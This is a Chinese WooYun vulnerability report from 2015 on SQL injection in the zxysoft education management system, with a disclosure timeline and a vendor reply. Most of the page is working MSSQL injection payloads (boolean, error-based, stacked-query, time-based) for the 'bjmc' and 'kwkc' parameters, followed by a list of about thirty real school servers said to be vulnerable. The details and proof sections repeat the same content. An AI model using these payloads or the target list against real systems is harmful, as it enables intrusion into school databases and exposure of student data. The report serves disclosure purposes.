当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107560

漏洞标题:zxysoft教育管理系统通用漏洞

相关厂商:安徽中鑫云信息科技公司

漏洞作者: 路人甲

提交时间:2015-04-20 12:23

修复时间:2015-07-23 09:46

公开时间:2015-07-23 09:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向第三方安全合作伙伴开放
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

一堆问题

详细说明:

http://www.zxysoft.com/
在官方演示站点都可以复现。
注入点#1:
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
在查询课表中,bjmc=存在注入
Place: GET
Parameter: bjmc
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 2757=2757 AND 'EAmE'='EAmE
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 4494=CONVERT(INT,(CHAR(58)+CHAR(102)+CHAR(114)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (4494=4494) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(112)+CHAR(115)+CHAR(58))) AND 'PvRa'='PvRa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bjmc=11%BF%B5%B8%B42'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bjmc=11%BF%B5%B8%B42' WAITFOR DELAY '0:0:5'--
---
Database: ReportServerTempDB
[9 tables]

园丁1.png


给出一些案例
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
http://218.22.37.5/webkbgl/xsbjkb.asp?bjmc=12%B8%DF%D6%B03
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC01
http://218.22.50.19/webkbgl/xsbjkb.asp?bjmc=12%B5%E7%D7%D3%D0%C5%CF%A2%B9%A4%B3%CC1
http://220.178.75.155/webksbm/default.asp
http://61.190.12.151:3880/webkbgl/xsbjkb.asp?bjmc=10-47
http://zyk.ahjsxx.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://jwgl.ahjsxy.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://220.165.147.248:8000/xsbjkb.asp?bjmc=271
http://lhub.cn:9000/webkbgl/xsbjkb.asp?bjmc=%E5%8A%A8%E6%BC%AB141
http://jxgl.ahiib.com/webkbgl/xsbjkb.asp?bjmc=%B1%A8%B9%D8131
http://61.190.17.182/webkbgl/xsbjkb.asp?bjmc=13%B2%E8%D2%D5
/webkbgl/
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC02
http://218.23.109.102/webkbgl/xsbjkb.asp?bjmc=13%B2%C6%B9%DC1
http://218.23.105.20:90/webkbgl/xsbjkb.asp?bjmc=%B2%E2%C1%BF1309
http://218.22.26.105/webkbgl/xsbjkb.asp?bjmc=13%B7%A8%C2%C901
http://218.22.191.26:9200/
#2:此处注入在考试安排中:
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
kwkc=参数存在注入:

园丁2.png


案例》》》
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
http://61.190.12.151:3880/webkbgl/kwxskc.asp?kwkc=1
http://zyk.ahjsxx.cn/webkbgl/kwbkkc.asp?kwkc=1
http://jwgl.ahjsxy.cn/webkbgl/kwbkkc.asp?kwkc=1
http://lhub.cn:9000/webkbgl/kwbkkc.asp?kwkc=4
www.hftyxy.com/cjgl/webkbgl/kwbkkc.asp?kwkc=3
http://jxgl.ahiib.com/webkbgl/kwbkkc.asp?kwkc=1
http://61.190.13.56/webkbgl/kwxskc.asp?kwkc=1
http://218.23.109.102/webkbgl/kwbkkc.asp?kwkc=1
http://218.23.105.20:90/webkbgl/kwxskc.asp?kwkc=1

漏洞证明:

http://www.zxysoft.com/
在官方演示站点都可以复现。
注入点#1:
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
在查询课表中,bjmc=存在注入
Place: GET
Parameter: bjmc
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 2757=2757 AND 'EAmE'='EAmE
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bjmc=11%BF%B5%B8%B42' AND 4494=CONVERT(INT,(CHAR(58)+CHAR(102)+CHAR(114)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (4494=4494) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(112)+CHAR(115)+CHAR(58))) AND 'PvRa'='PvRa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bjmc=11%BF%B5%B8%B42'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bjmc=11%BF%B5%B8%B42' WAITFOR DELAY '0:0:5'--
---
Database: ReportServerTempDB
[9 tables]

园丁1.png


给出一些案例
http://61.190.9.90/webkbgl/xsbjkb.asp?bjmc=11%BF%B5%B8%B42
http://218.22.37.5/webkbgl/xsbjkb.asp?bjmc=12%B8%DF%D6%B03
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC01
http://218.22.50.19/webkbgl/xsbjkb.asp?bjmc=12%B5%E7%D7%D3%D0%C5%CF%A2%B9%A4%B3%CC1
http://220.178.75.155/webksbm/default.asp
http://61.190.12.151:3880/webkbgl/xsbjkb.asp?bjmc=10-47
http://zyk.ahjsxx.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://jwgl.ahjsxy.cn/webkbgl/xsbjkb.asp?bjmc=11%BB%E1%BC%C6%D6%D0%D7%A8
http://220.165.147.248:8000/xsbjkb.asp?bjmc=271
http://lhub.cn:9000/webkbgl/xsbjkb.asp?bjmc=%E5%8A%A8%E6%BC%AB141
http://jxgl.ahiib.com/webkbgl/xsbjkb.asp?bjmc=%B1%A8%B9%D8131
http://61.190.17.182/webkbgl/xsbjkb.asp?bjmc=13%B2%E8%D2%D5
/webkbgl/
http://61.190.13.56/webkbgl/xsbjkb.asp?bjmc=11%B8%DF%D6%B0%B9%A4%D4%EC02
http://218.23.109.102/webkbgl/xsbjkb.asp?bjmc=13%B2%C6%B9%DC1
http://218.23.105.20:90/webkbgl/xsbjkb.asp?bjmc=%B2%E2%C1%BF1309
http://218.22.26.105/webkbgl/xsbjkb.asp?bjmc=13%B7%A8%C2%C901
http://218.22.191.26:9200/
#2:此处注入在考试安排中:
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
kwkc=参数存在注入:

园丁2.png


案例》》》
http://60.166.58.70:8080/webkbgl/kwxskc.asp?kwkc=2
http://61.190.12.151:3880/webkbgl/kwxskc.asp?kwkc=1
http://zyk.ahjsxx.cn/webkbgl/kwbkkc.asp?kwkc=1
http://jwgl.ahjsxy.cn/webkbgl/kwbkkc.asp?kwkc=1
http://lhub.cn:9000/webkbgl/kwbkkc.asp?kwkc=4
www.hftyxy.com/cjgl/webkbgl/kwbkkc.asp?kwkc=3
http://jxgl.ahiib.com/webkbgl/kwbkkc.asp?kwkc=1
http://61.190.13.56/webkbgl/kwxskc.asp?kwkc=1
http://218.23.109.102/webkbgl/kwbkkc.asp?kwkc=1
http://218.23.105.20:90/webkbgl/kwxskc.asp?kwkc=1

修复方案:

过滤咯

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-04-24 09:44

厂商回复:

CNVD未复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商及赛尔教育通报。

最新状态:

暂无